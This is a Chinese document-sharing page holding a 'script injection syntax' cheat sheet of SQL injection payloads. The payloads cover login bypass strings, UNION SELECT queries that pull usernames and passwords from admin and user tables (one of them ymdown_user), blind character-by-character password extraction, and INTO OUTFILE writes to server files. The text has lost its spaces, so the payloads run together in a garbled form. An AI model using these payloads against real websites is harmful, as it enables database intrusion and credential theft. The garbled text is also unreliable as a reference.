资源描述:
《脚本注入语法》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库。
1、'or1=1'or'1=1'/*'%23'andpassword='mypassid=-1unionselect1,1,1id=-1unionselectchar(97),char(97),char(97)id=1unionselect1,1,1frommembersid=1unionselect1,1,1fromadminid=1unionselect1,1,1fromuseruserid=1andpassword=mypassuserid=1andmid(password,3,1)=char(112)userid=1andmid(password,4,1)=cha
2、r(97)andord(mid(password,3,1))>111(ord函数很好用,可以返回整形的)'andLENGTH(password)='6(探测密码长度)'andLEFT(password,1)='m'andLEFT(password,2)='my…………………………依次类推'unionselect1,username,passwordfromuser/*'unionselect1,username,passwordfromuser/*='unionselect1,username,passwordfromuser/*(可以是1或者=后直接跟)99999'
3、unionselect1,username,passwordfromuser/*'intooutfile'c:/file.txt(导出文件)='or1=1intooutfile'c:/file.txt1'unionselect1,username,passwordfromuserintooutfile'c:/user.txtSELECTpasswordFROMadminsWHERElogin='John'INTODUMPFILE'/path/to/site/file.txt'id='unionselect1,username,passwordfromuserintoo
4、utfileid=-1unionselect1,database(),version()(灵活应用查询)常用查询测试语句,SELECT*FROMtableWHERE1=1SELECT*FROMtableWHERE'uuu'='uuu'SELECT*FROMtableWHERE1<>2SELECT*FROMtableWHERE3>2SELECT*FROMtableWHERE2<3SELECT*FROMtableWHERE1SELECT*FROMtableWHERE1+1SELECT*FROMtableWHERE1--1SELECT*FROMtableWHEREISNUL
5、L(NULL)SELECT*FROMtableWHEREISNULL(COT(0))SELECT*FROMtableWHERE1ISNOTNULLSELECT*FROMtableWHERENULLISNULLSELECT*FROMtableWHERE2BETWEEN1AND3SELECT*FROMtableWHERE'b'BETWEEN'a'AND'c'SELECT*FROMtableWHERE2IN(0,1,2)SELECT*FROMtableWHERECASEWHEN1>0THEN1ENDid=1unionselect1,1,1,1,1,1,1,1,1,1,1,1
6、,1,1,1,1,1,1,1unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userunionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1id=10000unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andgroupid=1unionselect1,username,1,password,1,1,1,1,1,1,1
7、,1,1,1,1,1,1,1,1fromymdown_userwhereid=1(替换,寻找密码)unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andord(mid(password,1,1))=49(验证第一位密码)unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andord(mid(password,2,1))=50(第二位)unionselect1,1,